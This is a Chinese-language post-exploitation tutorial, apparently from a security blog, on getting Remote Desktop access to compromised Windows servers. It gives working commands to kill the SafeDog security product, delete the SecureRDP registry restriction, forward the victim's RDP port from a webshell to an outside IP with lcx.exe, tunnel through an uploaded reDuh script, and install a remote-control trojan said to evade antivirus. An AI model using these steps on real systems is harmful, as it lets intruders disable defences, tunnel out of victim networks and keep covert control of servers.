目标服务器是内网终端端口是你开的话 99%需要端口转发 有时候如果服务器开了终端的话
很有可能映射了也不就需要转发
2. 目标是外网开了3389 但连接不上终端
1. 突破安全狗限制连接终端:
突破安全狗限制连接服务器终端:执行杀安全狗的exe
2. 突破SecureRDP限制连接终端
执行目录
echo y | reg delete HKEY_LOCAL_MACHINE/SOFTWARE/Terminalsoft/WTSFilter
删除这个限制连接上去
3. lcx进行端口转发(不是内网才可以转发 有时候外网的时候连接不上终端也尝试下转发出来连接 )
类型的工具还有 mylcx hd
webshell里执行
lcx.exe -slave 117.21.173.97 51 127.0.0.1 3389
(其实aspx大马自带一个转发的功能和上面的这行命令意义一样
127.0.0.1 3389 117.21.173.97 51 )
意思是将本机的3389转发到 117.21.173.97的51端口上
自己的cmd里面执
lcx.exe -listen 51 12345
意思是监听本机51端口 转发到本机的12345端口
如果有数据过来了 就连接本机的12345端口是连接目标服务器的终端
mstsc ————
127.0.0.1:12345
lcx自己补充完整的路径
117.21.173.97 你的外网ip
51 监听端口
127.0.0.1 不用变
3389 服务器的终端端口
4. 利用 reDuhServers 突破转发
分为客服端和服务端
将服务端上传网站目录 看目标站支持什么脚本 如果aspx的就上传aspx的脚本即可
记录http地址
本机(自己需要时外网)打开客服端
地址栏输入 http地址
127.0.0.1 12345
3389
127.0.0.1不要动 12345 你等下连接的端口
3389 服务器的终端端口
点击start 开启 看到有数据交换了 就连接本机
12345端口即可
127.0.0.1:12345
之后装 TV远控 进行远程图形化操作即可 转发的时候速度是超级慢 所以才说5
5.利用远程控制突破终端连接限制:
利用自己取得的系统权限,运行一个远控小马 上线之后控制桌面
装TV远控
TV远控通杀内外网而且是杀软不杀的 还可以穿透防火墙 而且连接的速度不是一般的快
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论